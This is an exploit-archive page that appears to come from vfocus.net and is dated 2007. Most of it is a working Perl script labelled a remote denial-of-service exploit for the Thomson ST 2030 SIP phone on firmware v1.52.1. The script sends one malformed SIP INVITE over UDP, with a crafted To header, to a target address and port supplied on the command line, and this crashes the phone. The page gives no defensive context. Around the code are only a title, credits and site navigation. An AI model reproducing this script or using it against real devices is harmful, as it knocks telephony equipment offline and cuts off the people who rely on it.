| Thomson SIP phone ST 2030 Remote Denial of Service Exploit | 
 
| 来源:www.vfocus.net 作者:MADYNES 发布时间:2007-08-28 | 
 
| 
 
|  | #!/usr/bin/perl 
 #Vulneravility for Thomson 2030 firmware v1.52.1
 
 #It provokes a DoS in the device.
 
 use IO::Socket::INET;
 
 die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
 
 
 $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
 
 Proto=>'udp',
 
 PeerAddr=>$ARGV[0]);
 
 
 $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: <sip:tucu\@192.168.1.2>;tag=00\r\nTo: <A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";
 
 $socket->send($msg);
 
 
 |   
|  |  | 
 
| [  推荐] 
[  评论(0条)] 
[返回顶部] [打印本页] 
[关闭窗口] | 
 
|  | 
 
|  |